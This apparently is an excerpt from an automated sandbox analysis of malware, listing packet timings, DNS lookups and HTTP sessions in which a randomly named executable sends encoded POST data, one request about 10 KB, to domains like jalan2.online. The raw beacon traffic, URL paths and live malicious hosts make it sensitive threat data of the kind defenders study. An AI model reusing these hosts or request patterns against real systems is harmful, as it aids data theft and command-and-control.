                                                Nov 20, 2024 07:16:30.582401037 CET8049944108.181.189.7192.168.2.4
                                                Nov 20, 2024 07:16:30.582467079 CET8049944108.181.189.7192.168.2.4
                                                Nov 20, 2024 07:16:30.582508087 CET8049944108.181.189.7192.168.2.4
                                                Nov 20, 2024 07:16:30.582547903 CET8049944108.181.189.7192.168.2.4
                                                Nov 20, 2024 07:16:30.582607031 CET8049944108.181.189.7192.168.2.4
                                                Nov 20, 2024 07:16:30.582644939 CET8049944108.181.189.7192.168.2.4
                                                Nov 20, 2024 07:16:30.582683086 CET8049944108.181.189.7192.168.2.4
                                                Nov 20, 2024 07:16:30.582720995 CET8049944108.181.189.7192.168.2.4
                                                Nov 20, 2024 07:16:31.393718004 CET8049944108.181.189.7192.168.2.4
                                                Nov 20, 2024 07:16:31.393914938 CET4994480192.168.2.4108.181.189.7
                                                Nov 20, 2024 07:16:32.081674099 CET4994480192.168.2.4108.181.189.7
                                                Nov 20, 2024 07:16:32.086644888 CET8049944108.181.189.7192.168.2.4
                                                Nov 20, 2024 07:16:33.099879026 CET4996380192.168.2.4108.181.189.7
                                                Nov 20, 2024 07:16:33.105079889 CET8049963108.181.189.7192.168.2.4
                                                Nov 20, 2024 07:16:33.105211020 CET4996380192.168.2.4108.181.189.7
                                                Nov 20, 2024 07:16:33.112720966 CET4996380192.168.2.4108.181.189.7
                                                Nov 20, 2024 07:16:33.117765903 CET8049963108.181.189.7192.168.2.4
                                                Nov 20, 2024 07:16:33.637625933 CET8049963108.181.189.7192.168.2.4
                                                Nov 20, 2024 07:16:33.637675047 CET8049963108.181.189.7192.168.2.4
                                                Nov 20, 2024 07:16:33.637721062 CET8049963108.181.189.7192.168.2.4
                                                Nov 20, 2024 07:16:33.637769938 CET4996380192.168.2.4108.181.189.7
                                                Nov 20, 2024 07:16:33.637801886 CET4996380192.168.2.4108.181.189.7
                                                Nov 20, 2024 07:16:33.644794941 CET4996380192.168.2.4108.181.189.7
                                                Nov 20, 2024 07:16:33.649724007 CET8049963108.181.189.7192.168.2.4
                                                Nov 20, 2024 07:16:38.896557093 CET4999980192.168.2.413.248.169.48
                                                Nov 20, 2024 07:16:38.901681900 CET804999913.248.169.48192.168.2.4
                                                Nov 20, 2024 07:16:38.901776075 CET4999980192.168.2.413.248.169.48
                                                Nov 20, 2024 07:16:38.916897058 CET4999980192.168.2.413.248.169.48
                                                Nov 20, 2024 07:16:38.921957016 CET804999913.248.169.48192.168.2.4
                                                Nov 20, 2024 07:16:39.358498096 CET804999913.248.169.48192.168.2.4
                                                Nov 20, 2024 07:16:39.358768940 CET4999980192.168.2.413.248.169.48
                                                Nov 20, 2024 07:16:40.425430059 CET4999980192.168.2.413.248.169.48
                                                Nov 20, 2024 07:16:40.430419922 CET804999913.248.169.48192.168.2.4
                                                Nov 20, 2024 07:16:41.445137978 CET5000880192.168.2.413.248.169.48
                                                Nov 20, 2024 07:16:41.450510979 CET805000813.248.169.48192.168.2.4
                                                Nov 20, 2024 07:16:41.450655937 CET5000880192.168.2.413.248.169.48
                                                Nov 20, 2024 07:16:41.470963955 CET5000880192.168.2.413.248.169.48
                                                Nov 20, 2024 07:16:41.475928068 CET805000813.248.169.48192.168.2.4
                                                Nov 20, 2024 07:16:41.914563894 CET805000813.248.169.48192.168.2.4
                                                Nov 20, 2024 07:16:41.914657116 CET5000880192.168.2.413.248.169.48
                                                Nov 20, 2024 07:16:42.972294092 CET5000880192.168.2.413.248.169.48
                                                Nov 20, 2024 07:16:42.977381945 CET805000813.248.169.48192.168.2.4
                                                Nov 20, 2024 07:16:43.999444008 CET5000980192.168.2.413.248.169.48
                                                Nov 20, 2024 07:16:44.004851103 CET805000913.248.169.48192.168.2.4
                                                Nov 20, 2024 07:16:44.004949093 CET5000980192.168.2.413.248.169.48
                                                Nov 20, 2024 07:16:44.018099070 CET5000980192.168.2.413.248.169.48
                                                Nov 20, 2024 07:16:44.023124933 CET805000913.248.169.48192.168.2.4
                                                Nov 20, 2024 07:16:44.023155928 CET805000913.248.169.48192.168.2.4
                                                Nov 20, 2024 07:16:44.023183107 CET805000913.248.169.48192.168.2.4
                                                Nov 20, 2024 07:16:44.023241043 CET805000913.248.169.48192.168.2.4
                                                Nov 20, 2024 07:16:44.023269892 CET805000913.248.169.48192.168.2.4
                                                Nov 20, 2024 07:16:44.023334026 CET805000913.248.169.48192.168.2.4
                                                Nov 20, 2024 07:16:44.023385048 CET805000913.248.169.48192.168.2.4
                                                Nov 20, 2024 07:16:44.023411989 CET805000913.248.169.48192.168.2.4
                                                Nov 20, 2024 07:16:44.023437977 CET805000913.248.169.48192.168.2.4
                                                Nov 20, 2024 07:16:44.486836910 CET805000913.248.169.48192.168.2.4
                                                Nov 20, 2024 07:16:44.486979961 CET5000980192.168.2.413.248.169.48
                                                Nov 20, 2024 07:16:45.519236088 CET5000980192.168.2.413.248.169.48
                                                Nov 20, 2024 07:16:45.524521112 CET805000913.248.169.48192.168.2.4
                                                Nov 20, 2024 07:16:46.538028955 CET5001080192.168.2.413.248.169.48
                                                Nov 20, 2024 07:16:46.543339968 CET805001013.248.169.48192.168.2.4
                                                Nov 20, 2024 07:16:46.543436050 CET5001080192.168.2.413.248.169.48
                                                Nov 20, 2024 07:16:46.553575993 CET5001080192.168.2.413.248.169.48
                                                Nov 20, 2024 07:16:46.558578968 CET805001013.248.169.48192.168.2.4
                                                Nov 20, 2024 07:16:47.040091991 CET805001013.248.169.48192.168.2.4
                                                Nov 20, 2024 07:16:47.040144920 CET805001013.248.169.48192.168.2.4
                                                Nov 20, 2024 07:16:47.040281057 CET5001080192.168.2.413.248.169.48
                                                Nov 20, 2024 07:16:47.044049025 CET5001080192.168.2.413.248.169.48
                                                Nov 20, 2024 07:16:47.049066067 CET805001013.248.169.48192.168.2.4
                                                Nov 20, 2024 07:17:01.700808048 CET5001180192.168.2.423.225.159.42
                                                Nov 20, 2024 07:17:01.706254005 CET805001123.225.159.42192.168.2.4
                                                Nov 20, 2024 07:17:01.706691980 CET5001180192.168.2.423.225.159.42
                                                Nov 20, 2024 07:17:01.733335018 CET5001180192.168.2.423.225.159.42
                                                Nov 20, 2024 07:17:01.739712000 CET805001123.225.159.42192.168.2.4
                                                Nov 20, 2024 07:17:02.265736103 CET805001123.225.159.42192.168.2.4
                                                Nov 20, 2024 07:17:02.315973997 CET5001180192.168.2.423.225.159.42
                                                Nov 20, 2024 07:17:02.337904930 CET805001123.225.159.42192.168.2.4
                                                Nov 20, 2024 07:17:02.340368032 CET5001180192.168.2.423.225.159.42
                                                Nov 20, 2024 07:17:03.241511106 CET5001180192.168.2.423.225.159.42
                                                Nov 20, 2024 07:17:04.257920980 CET5001280192.168.2.423.225.159.42
                                                Nov 20, 2024 07:17:04.263247967 CET805001223.225.159.42192.168.2.4
                                                Nov 20, 2024 07:17:04.263330936 CET5001280192.168.2.423.225.159.42
                                                Nov 20, 2024 07:17:04.285145044 CET5001280192.168.2.423.225.159.42
                                                Nov 20, 2024 07:17:04.290256977 CET805001223.225.159.42192.168.2.4
                                                Nov 20, 2024 07:17:04.785247087 CET805001223.225.159.42192.168.2.4
                                                Nov 20, 2024 07:17:04.831629992 CET5001280192.168.2.423.225.159.42
                                                Nov 20, 2024 07:17:04.861315012 CET805001223.225.159.42192.168.2.4
                                                Nov 20, 2024 07:17:04.861464977 CET5001280192.168.2.423.225.159.42
                                                Nov 20, 2024 07:17:05.800518036 CET5001280192.168.2.423.225.159.42
                                                Nov 20, 2024 07:17:06.821897984 CET5001380192.168.2.423.225.159.42
                                                Nov 20, 2024 07:17:06.827040911 CET805001323.225.159.42192.168.2.4
                                                Nov 20, 2024 07:17:06.827142000 CET5001380192.168.2.423.225.159.42
                                                Nov 20, 2024 07:17:06.847160101 CET5001380192.168.2.423.225.159.42
                                                Nov 20, 2024 07:17:06.852231979 CET805001323.225.159.42192.168.2.4
                                                Nov 20, 2024 07:17:06.852267027 CET805001323.225.159.42192.168.2.4
                                                Nov 20, 2024 07:17:06.852294922 CET805001323.225.159.42192.168.2.4
                                                Nov 20, 2024 07:17:06.852348089 CET805001323.225.159.42192.168.2.4
                                                Nov 20, 2024 07:17:06.852379084 CET805001323.225.159.42192.168.2.4
                                                Nov 20, 2024 07:17:06.852411032 CET805001323.225.159.42192.168.2.4
                                                Nov 20, 2024 07:17:06.852440119 CET805001323.225.159.42192.168.2.4
                                                Nov 20, 2024 07:17:06.852489948 CET805001323.225.159.42192.168.2.4
                                                Nov 20, 2024 07:17:06.852516890 CET805001323.225.159.42192.168.2.4
                                                Nov 20, 2024 07:17:07.349201918 CET805001323.225.159.42192.168.2.4
                                                Nov 20, 2024 07:17:07.409732103 CET5001380192.168.2.423.225.159.42
                                                Nov 20, 2024 07:17:07.424129009 CET805001323.225.159.42192.168.2.4
                                                Nov 20, 2024 07:17:07.428109884 CET5001380192.168.2.423.225.159.42
                                                Nov 20, 2024 07:17:08.362921000 CET5001380192.168.2.423.225.159.42
                                                Nov 20, 2024 07:17:09.383517027 CET5001480192.168.2.423.225.159.42
                                                Nov 20, 2024 07:17:09.388613939 CET805001423.225.159.42192.168.2.4
                                                Nov 20, 2024 07:17:09.388711929 CET5001480192.168.2.423.225.159.42
                                                Nov 20, 2024 07:17:09.407305002 CET5001480192.168.2.423.225.159.42
                                                Nov 20, 2024 07:17:09.412363052 CET805001423.225.159.42192.168.2.4
                                                Nov 20, 2024 07:17:10.487343073 CET805001423.225.159.42192.168.2.4
                                                Nov 20, 2024 07:17:10.487389088 CET805001423.225.159.42192.168.2.4
                                                Nov 20, 2024 07:17:10.487421989 CET805001423.225.159.42192.168.2.4
                                                Nov 20, 2024 07:17:10.487457991 CET805001423.225.159.42192.168.2.4
                                                Nov 20, 2024 07:17:10.487544060 CET5001480192.168.2.423.225.159.42
                                                Nov 20, 2024 07:17:10.487580061 CET5001480192.168.2.423.225.159.42
                                                Nov 20, 2024 07:17:10.681565046 CET5001480192.168.2.423.225.159.42
                                                Nov 20, 2024 07:17:10.686512947 CET805001423.225.159.42192.168.2.4
                                                TimestampSource PortDest PortSource IPDest IP
                                                Nov 20, 2024 07:16:09.387995005 CET5375453192.168.2.41.1.1.1
                                                Nov 20, 2024 07:16:09.710263968 CET53537541.1.1.1192.168.2.4
                                                Nov 20, 2024 07:16:25.352030993 CET5178353192.168.2.41.1.1.1
                                                Nov 20, 2024 07:16:25.393264055 CET53517831.1.1.1192.168.2.4
                                                Nov 20, 2024 07:16:38.652740955 CET4987953192.168.2.41.1.1.1
                                                Nov 20, 2024 07:16:38.893996954 CET53498791.1.1.1192.168.2.4
                                                Nov 20, 2024 07:16:52.083024979 CET5141753192.168.2.41.1.1.1
                                                Nov 20, 2024 07:16:53.031152010 CET53514171.1.1.1192.168.2.4
                                                Nov 20, 2024 07:17:01.091922045 CET5241353192.168.2.41.1.1.1
                                                Nov 20, 2024 07:17:01.697036028 CET53524131.1.1.1192.168.2.4
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Nov 20, 2024 07:16:09.387995005 CET192.168.2.41.1.1.10x3af5Standard query (0)www.bloodbalancecaps.shopA (IP address)IN (0x0001)false
                                                Nov 20, 2024 07:16:25.352030993 CET192.168.2.41.1.1.10x2388Standard query (0)www.jalan2.onlineA (IP address)IN (0x0001)false
                                                Nov 20, 2024 07:16:38.652740955 CET192.168.2.41.1.1.10x6200Standard query (0)www.avalanchefi.xyzA (IP address)IN (0x0001)false
                                                Nov 20, 2024 07:16:52.083024979 CET192.168.2.41.1.1.10xa23eStandard query (0)www.02760.wangA (IP address)IN (0x0001)false
                                                Nov 20, 2024 07:17:01.091922045 CET192.168.2.41.1.1.10x5495Standard query (0)www.laohub10.netA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Nov 20, 2024 07:16:09.710263968 CET1.1.1.1192.168.2.40x3af5No error (0)www.bloodbalancecaps.shopbloodbalancecaps.shopCNAME (Canonical name)IN (0x0001)false
                                                Nov 20, 2024 07:16:09.710263968 CET1.1.1.1192.168.2.40x3af5No error (0)bloodbalancecaps.shop108.179.253.197A (IP address)IN (0x0001)false
                                                Nov 20, 2024 07:16:25.393264055 CET1.1.1.1192.168.2.40x2388No error (0)www.jalan2.onlinejalan2.onlineCNAME (Canonical name)IN (0x0001)false
                                                Nov 20, 2024 07:16:25.393264055 CET1.1.1.1192.168.2.40x2388No error (0)jalan2.online108.181.189.7A (IP address)IN (0x0001)false
                                                Nov 20, 2024 07:16:38.893996954 CET1.1.1.1192.168.2.40x6200No error (0)www.avalanchefi.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                Nov 20, 2024 07:16:38.893996954 CET1.1.1.1192.168.2.40x6200No error (0)www.avalanchefi.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                Nov 20, 2024 07:16:53.031152010 CET1.1.1.1192.168.2.40xa23eServer failure (2)www.02760.wangnonenoneA (IP address)IN (0x0001)false
                                                Nov 20, 2024 07:17:01.697036028 CET1.1.1.1192.168.2.40x5495No error (0)www.laohub10.netr0lqcud7.nbnnn.xyzCNAME (Canonical name)IN (0x0001)false
                                                Nov 20, 2024 07:17:01.697036028 CET1.1.1.1192.168.2.40x5495No error (0)r0lqcud7.nbnnn.xyz23.225.159.42A (IP address)IN (0x0001)false
                                                Nov 20, 2024 07:17:01.697036028 CET1.1.1.1192.168.2.40x5495No error (0)r0lqcud7.nbnnn.xyz23.225.160.132A (IP address)IN (0x0001)false
                                                Nov 20, 2024 07:17:01.697036028 CET1.1.1.1192.168.2.40x5495No error (0)r0lqcud7.nbnnn.xyz27.124.4.246A (IP address)IN (0x0001)false
                                                Nov 20, 2024 07:17:01.697036028 CET1.1.1.1192.168.2.40x5495No error (0)r0lqcud7.nbnnn.xyz202.79.161.151A (IP address)IN (0x0001)false
                                                • www.bloodbalancecaps.shop
                                                • www.jalan2.online
                                                • www.avalanchefi.xyz
                                                • www.laohub10.net
                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.449811108.179.253.197801068C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 07:16:09.731165886 CET534OUTGET /7n6c/?Vblddl=ePeKNPyUeLpNn1ut9QR5+vkaHUGSQvJrwPLb6fKcgQCso5jGZqjP6M9GYYTFao+4npn6icqsLwsi7nEjf66UvTUwrIE2dD1LfojjSGoioIp2xNG+LZcOM+Y=&At=4ZW0 HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-US,en;q=0.9
                                                Host: www.bloodbalancecaps.shop
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                Nov 20, 2024 07:16:10.316586971 CET550INHTTP/1.1 301 Moved Permanently
                                                Date: Wed, 20 Nov 2024 06:16:10 GMT
                                                Server: nginx/1.23.4
                                                Content-Type: text/html; charset=UTF-8
                                                Content-Length: 0
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                X-Redirect-By: WordPress
                                                Location: http://bloodbalancecaps.shop/7n6c/?Vblddl=ePeKNPyUeLpNn1ut9QR5+vkaHUGSQvJrwPLb6fKcgQCso5jGZqjP6M9GYYTFao+4npn6icqsLwsi7nEjf66UvTUwrIE2dD1LfojjSGoioIp2xNG+LZcOM+Y=&At=4ZW0
                                                X-Endurance-Cache-Level: 2
                                                X-nginx-cache: WordPress
                                                X-Server-Cache: true
                                                X-Proxy-Cache: MISS


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.449910108.181.189.7801068C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 07:16:25.426307917 CET801OUTPOST /xu9o/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Host: www.jalan2.online
                                                Origin: http://www.jalan2.online
                                                Referer: http://www.jalan2.online/xu9o/
                                                Content-Type: application/x-www-form-urlencoded
                                                Connection: close
                                                Content-Length: 203
                                                Cache-Control: max-age=0
                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                Data Raw: 56 62 6c 64 64 6c 3d 56 33 36 48 6e 6d 69 69 37 39 65 36 5a 61 44 49 36 54 53 62 6c 71 66 57 73 56 72 4b 54 35 74 77 69 59 35 5a 30 39 7a 72 57 36 2b 51 66 54 78 4e 72 72 51 75 58 39 56 63 64 45 51 33 4c 4a 77 6e 38 36 78 35 55 56 74 4c 63 55 45 42 68 61 4c 6a 47 6e 77 6c 4d 72 30 69 4c 55 74 43 75 4a 4a 66 56 6c 57 33 4e 74 46 67 58 31 64 74 56 47 6f 30 2b 71 61 48 56 42 4b 6b 6a 38 52 6f 63 52 31 69 53 52 55 62 68 4b 69 4f 70 39 35 56 46 70 38 7a 69 49 6b 72 6d 49 7a 34 36 52 52 30 53 6f 48 6b 56 4c 52 52 4b 56 41 71 30 48 58 4e 74 34 4a 72 70 75 39 61 73 63 74 75 50 4e 48 68 7a 77 2f 67 55 67 3d 3d
                                                Data Ascii: Vblddl=V36Hnmii79e6ZaDI6TSblqfWsVrKT5twiY5Z09zrW6+QfTxNrrQuX9VcdEQ3LJwn86x5UVtLcUEBhaLjGnwlMr0iLUtCuJJfVlW3NtFgX1dtVGo0+qaHVBKkj8RocR1iSRUbhKiOp95VFp8ziIkrmIz46RR0SoHkVLRRKVAq0HXNt4Jrpu9asctuPNHhzw/gUg==
                                                Nov 20, 2024 07:16:25.980603933 CET279INHTTP/1.1 404 Not Found
                                                content-type: text/html
                                                cache-control: private, no-cache, max-age=0
                                                pragma: no-cache
                                                date: Wed, 20 Nov 2024 06:16:25 GMT
                                                server: LiteSpeed
                                                content-encoding: gzip
                                                vary: Accept-Encoding
                                                transfer-encoding: chunked
                                                connection: close
                                                Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a
                                                Data Ascii: a
                                                Nov 20, 2024 07:16:25.981087923 CET713INData Raw: 32 62 64 0d 0a 65 54 6b 6b db 30 14 fd 5e d8 7f b8 4d 19 b4 10 27 76 ea b0 61 3b 66 63 0f 36 18 5b a1 85 b1 8f b2 75 1d 89 ca 92 27 29 af 95 fe f7 5d d9 49 9a b6 16 d8 92 7c 75 74 ee 39 57 2a ce 3f ff fa 74 f7 e7 e6 0b 08 df aa f2 ac 08 1f 70 7e
                                                Data Ascii: 2bdeTkk0^M'va;fc6[u')]I|ut9W*?tp~p1(gI_8}Z4k)`-qGPQh#kYc `18at/8WY1RE.\v.2pqf*w6@!Edt,CH4


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.449928108.181.189.7801068C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 07:16:27.986664057 CET821OUTPOST /xu9o/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Host: www.jalan2.online
                                                Origin: http://www.jalan2.online
                                                Referer: http://www.jalan2.online/xu9o/
                                                Content-Type: application/x-www-form-urlencoded
                                                Connection: close
                                                Content-Length: 223
                                                Cache-Control: max-age=0
                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                Data Raw: 56 62 6c 64 64 6c 3d 56 33 36 48 6e 6d 69 69 37 39 65 36 4c 72 7a 49 34 31 61 62 77 61 66 56 6a 31 72 4b 61 5a 74 38 69 59 31 5a 30 2f 44 37 57 70 57 51 52 54 42 4e 36 5a 6f 75 51 39 56 63 57 6b 51 79 57 5a 77 75 38 36 39 48 55 51 56 4c 63 55 67 42 68 66 33 6a 42 55 6f 6d 50 62 30 67 53 45 74 41 7a 35 4a 66 56 6c 57 33 4e 75 35 47 58 31 56 74 56 58 59 30 2f 4c 61 45 54 78 4b 6a 31 73 52 6f 59 52 31 6d 53 52 56 49 68 4a 6d 6f 70 2f 42 56 46 6f 4d 7a 6a 5a 6b 6b 74 49 79 39 30 78 52 68 63 4c 79 78 51 70 73 53 45 44 55 4f 7a 45 54 56 6c 65 45 78 34 66 63 4e 2b 63 4a 64 53 4b 4f 56 2b 7a 43 70 50 73 76 65 4c 7a 64 4f 31 38 69 4b 4f 30 38 31 61 43 49 6f 34 59 45 3d
                                                Data Ascii: Vblddl=V36Hnmii79e6LrzI41abwafVj1rKaZt8iY1Z0/D7WpWQRTBN6ZouQ9VcWkQyWZwu869HUQVLcUgBhf3jBUomPb0gSEtAz5JfVlW3Nu5GX1VtVXY0/LaETxKj1sRoYR1mSRVIhJmop/BVFoMzjZkktIy90xRhcLyxQpsSEDUOzETVleEx4fcN+cJdSKOV+zCpPsveLzdO18iKO081aCIo4YE=
                                                Nov 20, 2024 07:16:28.502454042 CET992INHTTP/1.1 404 Not Found
                                                content-type: text/html
                                                cache-control: private, no-cache, max-age=0
                                                pragma: no-cache
                                                date: Wed, 20 Nov 2024 06:16:28 GMT
                                                server: LiteSpeed
                                                content-encoding: gzip
                                                vary: Accept-Encoding
                                                transfer-encoding: chunked
                                                connection: close
                                                Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a 32 62 64 0d 0a 65 54 6b 6b db 30 14 fd 5e d8 7f b8 4d 19 b4 10 27 76 ea b0 61 3b 66 63 0f 36 18 5b a1 85 b1 8f b2 75 1d 89 ca 92 27 29 af 95 fe f7 5d d9 49 9a b6 16 d8 92 7c 75 74 ee 39 57 2a ce 3f ff fa 74 f7 e7 e6 0b 08 df aa f2 ac 08 1f 70 7e a7 70 31 12 28 97 c2 67 49 1c bf 1d 85 5f c8 38 7d 5a f4 0c 34 6b 29 60 2d 71 d3 19 eb 47 50 1b ed 51 fb c5 68 23 b9 17 0b 8e 6b 59 63 d4 0f c6 20 b5 f4 92 a9 c8 d5 8c 60 93 31 38 61 a5 be 8f bc 89 1a e9 17 da 04 74 2f bd c2 12 d2 38 85 9f c6 c3 57 b3 d2 fc cd 59 31 1d e6 8b 9e 52 f9 a1 45 2e 19 5c 76 16 1b b4 2e aa 8d 32 96 70 05 b6 98 71 66 ef af 1e 2a c3 77 0f 15 ab ef 97 36 40 0c 21 d9 45 1c c7 e7 b2 0d 64 99 f6 8f 8f c5 74 00 2c a6 fb ac c2 b2 43 de c3 12 b8 48 d3 34 87 96 d9 a5 d4 59 9c 37 94 62 06 da d8 96 29 48 d2 6e 3b 9d c5 dd 16 3e 5a 4a 6d 0c df 50 ad d1 cb 9a 51 76 4c bb c8 a1 95 4d 0e 27 12 e6 f0 8a 15 5c 34 4d 93 87 ec b9 5c bf 50 9d ad bc a1 dd a5 8e 9e 61 8c 4a 08 cf e9 02 8f 5b 1f 31 25 97 3a 83 [TRUNCATED]
                                                Data Ascii: a2bdeTkk0^M'va;fc6[u')]I|ut9W*?tp~p1(gI_8}Z4k)`-qGPQh#kYc `18at/8WY1RE.\v.2pqf*w6@!Edt,CH4Y7b)Hn;>ZJmPQvLM'\4M\PaJ[1%:L@C|>&"%dgbt*gct\]9B$@%rfUR0l(N2)= lMh<*Y:tyT+,ZF9F{^L;}"h8gY>q.2hkk^O$NhuB+c9>(:.+v6IW`l2xcxz+:}_-ohWvT$dm47/kDa-4_Jt] %6$YvLi>Fj3bC{.~p/+a0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                3192.168.2.449944108.181.189.7801068C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 07:16:30.577260971 CET10903OUTPOST /xu9o/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Host: www.jalan2.online
                                                Origin: http://www.jalan2.online
                                                Referer: http://www.jalan2.online/xu9o/
                                                Content-Type: application/x-www-form-urlencoded
                                                Connection: close
                                                Content-Length: 10303
                                                Cache-Control: max-age=0
                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                Data Raw: 56 62 6c 64 64 6c 3d 56 33 36 48 6e 6d 69 69 37 39 65 36 4c 72 7a 49 34 31 61 62 77 61 66 56 6a 31 72 4b 61 5a 74 38 69 59 31 5a 30 2f 44 37 57 76 4f 51 52 67 4a 4e 6f 4f 38 75 52 39 56 63 56 6b 51 7a 57 5a 78 75 38 2b 5a 4c 55 51 51 38 63 57 49 42 69 36 37 6a 41 6c 6f 6d 59 72 30 67 64 6b 74 44 75 4a 4a 4b 56 6c 47 72 4e 74 42 47 58 31 56 74 56 55 41 30 37 61 61 45 49 78 4b 6b 6a 38 52 61 63 52 30 44 53 52 63 39 68 49 53 65 75 50 68 56 46 49 63 7a 68 72 63 6b 67 49 79 2f 33 78 51 6b 63 4c 76 68 51 70 67 34 45 44 49 77 7a 44 62 56 6d 72 78 6f 67 4d 6f 78 6a 75 68 51 4f 62 7a 30 33 79 53 61 50 4e 48 46 4f 57 42 58 33 39 61 71 4c 45 31 59 4f 67 59 32 72 75 67 75 68 42 39 70 44 63 31 35 37 38 45 5a 48 43 63 58 71 74 53 73 4e 33 77 36 51 39 44 79 4d 6b 6e 55 43 2b 4b 76 52 30 74 45 39 74 46 42 78 64 71 6c 64 2f 36 4f 59 69 5a 30 78 71 33 67 2f 6b 32 79 38 73 49 41 56 50 78 41 41 50 49 65 72 35 59 2f 67 74 30 55 75 57 77 33 38 69 2f 31 39 57 75 34 35 45 48 47 66 43 52 43 4f 58 2b 38 65 64 58 4c 45 7a 75 [TRUNCATED]
                                                Data Ascii: Vblddl=V36Hnmii79e6LrzI41abwafVj1rKaZt8iY1Z0/D7WvOQRgJNoO8uR9VcVkQzWZxu8+ZLUQQ8cWIBi67jAlomYr0gdktDuJJKVlGrNtBGX1VtVUA07aaEIxKkj8RacR0DSRc9hISeuPhVFIczhrckgIy/3xQkcLvhQpg4EDIwzDbVmrxogMoxjuhQObz03ySaPNHFOWBX39aqLE1YOgY2ruguhB9pDc1578EZHCcXqtSsN3w6Q9DyMknUC+KvR0tE9tFBxdqld/6OYiZ0xq3g/k2y8sIAVPxAAPIer5Y/gt0UuWw38i/19Wu45EHGfCRCOX+8edXLEzu/C81bJVJFpRVk2OtJchTxTm8p+8cn6YliGAP9FnkgmK2FumdF26Ubjfmwffu/DHoZ/Vxp0Z+ORH8akdwTApMk3BJ2tED6eadtPx4DYS4aF05v4W0j2dSk8r/VgbV25lC4ZjPhTEMVQSKMVVtPIaNNNb4H79VOYD2WoEodhIG2TaY26lA4u5w35jQ4Y8OFcX6YsfE8IMQimhvUNI+oRok3zSdj226gpaPKxETKD/oTeXQ4cnpCGvrXqdUu5yUM4B7YDRKmZazML6tazfClnWri1ycruVENOdQcy70AdhELCwvGhH4wOtAJU7FQrgqU6lh9Azsd4lpnKHApm+GtwRCXXkiEdoAVqs6nA8/EiBW6HZfUIqx6ok0zyNqG0pzzkZRxkTr/bG5wcbt/FHEZSlb7ZNF+uDNlHDrRt04ZfXps2M4ryzMdTMcxvIpUVaJexc58eeltcRHctafiMYkjilEABdvgq4rMxAHvaa5YvxVnGmNVSKJwtu88OXGTbR2MrTaowCyrW5W0hnGFfkD9IRMInSQzxH1kV8spMgVlOqqufG1gMlXxE/4WWeOnxLJCJmbOXrRrm6fuIVCqlniKJKbVP/9JDgKukTjFZ0dmytlQa+2ZLFqNhNFmsxM4CPxbYenh7yMP6urDr0XRDfekclmgbSW2Ld0JVwlhf [TRUNCATED]


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                4192.168.2.449963108.181.189.7801068C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 07:16:33.112720966 CET526OUTGET /xu9o/?Vblddl=Y1SnkQLh9oyCIrW0o0O4vqPemXX8Spt1zoY93P6OWbCvdS06v54NadN0bxhIZaxlyI96f1lIInN9xaPSBVcrMr8DLl9ZyJ18b2nxQ81rZE0uLnMg7aaVIRg=&At=4ZW0 HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-US,en;q=0.9
